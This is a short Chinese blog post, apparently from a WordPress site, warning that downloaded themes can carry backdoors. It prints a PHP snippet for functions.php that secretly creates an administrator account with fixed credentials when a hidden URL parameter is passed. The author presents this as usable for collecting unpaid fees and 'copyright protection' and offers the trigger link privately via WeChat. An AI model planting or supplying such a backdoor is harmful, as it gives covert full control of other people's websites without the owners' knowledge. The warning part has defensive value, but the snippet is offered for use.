最近很多朋友问我百度搜索的模板能不能用?能用,但是有风险!因为为模板添加一个后门很简单,这里所谓的后门就是通过在模板函数文件中添加一段代码,然后通过一段隐秘的链接尽快就可以设置管理员账号进入网站后台。

以下既是一段简单的后门代码:

  1. add_action(‘wp_head’, ‘holeinthewall’);
  2. function holeinthewall() {
  3. If ($_GET[‘backdoor’] == ‘go’) {
  4. require(‘wp-includes/registration.php’);
  5. If (!username_exists(‘username’)) {
  6. $user_id = wp_create_user(‘username’, ‘password’);
  7. $user = new WP_User($user_id);
  8. $user->set_role(‘administrator’);
  9. }
  10. }
  11. }

模板制作者只要把这段代码放置到模板函数文件functions.php文件中,然后通过一个隐秘的链接就可以创建一个用户名为“username”,密码为:“password” 的管理员账号,从而进入网站后台为所欲为。

说明:因为这种方式仅可以使用到接单追款和版权保护,所以不再分享隐秘链接,如有特殊需要请联系我的个人微信号(xiaochuanblog)索要。

声明:本站分享的WordPress主题/插件均遵循 GPLv2 许可协议(免费开源),相关介绍资料仅供学习参考,实际版本可能会因版本迭代或开发者调整而产生变化,如程序中涉及有第三方原创图像、设计模板、远程服务等内容,应获得作者授权后方可使用。本站不提供该程序/软件的产品授权与技术服务,亦不收取相关费用。